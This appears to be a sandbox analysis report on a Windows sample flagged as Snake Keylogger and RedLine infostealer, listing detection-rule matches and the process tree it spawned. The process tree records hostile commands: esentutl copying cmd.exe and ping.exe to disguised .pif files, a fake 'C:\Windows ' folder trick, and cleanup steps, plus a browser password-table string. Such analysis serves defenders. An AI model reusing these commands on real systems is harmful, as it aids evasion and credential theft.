            Source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.EPTMAcgvNZ.exe.21a70ae8.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000001.1460585249.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0000001A.00000002.2505611445.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000017.00000002.2505730658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0000001A.00000001.1548998614.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@34/11@5/5
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B17FD2 GetDiskFreeSpaceA,0_2_02B17FD2
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,14_2_004019F0
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B26DC8 CoCreateInstance,0_2_02B26DC8
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,14_2_004019F0
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
            Source: C:\Users\Public\Libraries\yihfsboC.pifCommand line argument: 08A14_2_00413780
            Source: C:\Users\Public\Libraries\yihfsboC.pifCommand line argument: 08A23_2_00413780
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: yihfsboC.pif, 0000000E.00000002.2540746609.000000002715E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.00000000349EF000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.00000000349E1000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A2B000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.00000000349D1000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A38000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2546648768.0000000035A4C000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2537622019.0000000029A0B000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289E7000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.000000002899D000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: EPTMAcgvNZ.exeReversingLabs: Detection: 63%
            Source: EPTMAcgvNZ.exeVirustotal: Detection: 71%
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeFile read: C:\Users\user\Desktop\EPTMAcgvNZ.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\EPTMAcgvNZ.exe "C:\Users\user\Desktop\EPTMAcgvNZ.exe"
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\yihfsboC.cmd" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\EPTMAcgvNZ.exe /d C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF /o
            Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
            Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
            Source: unknownProcess created: C:\Users\Public\Libraries\Cobsfhiy.PIF "C:\Users\Public\Libraries\Cobsfhiy.PIF"
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: unknownProcess created: C:\Users\Public\Libraries\Cobsfhiy.PIF "C:\Users\Public\Libraries\Cobsfhiy.PIF"
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\yihfsboC.cmd" "Jump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\EPTMAcgvNZ.exe /d C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF /oJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pifJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
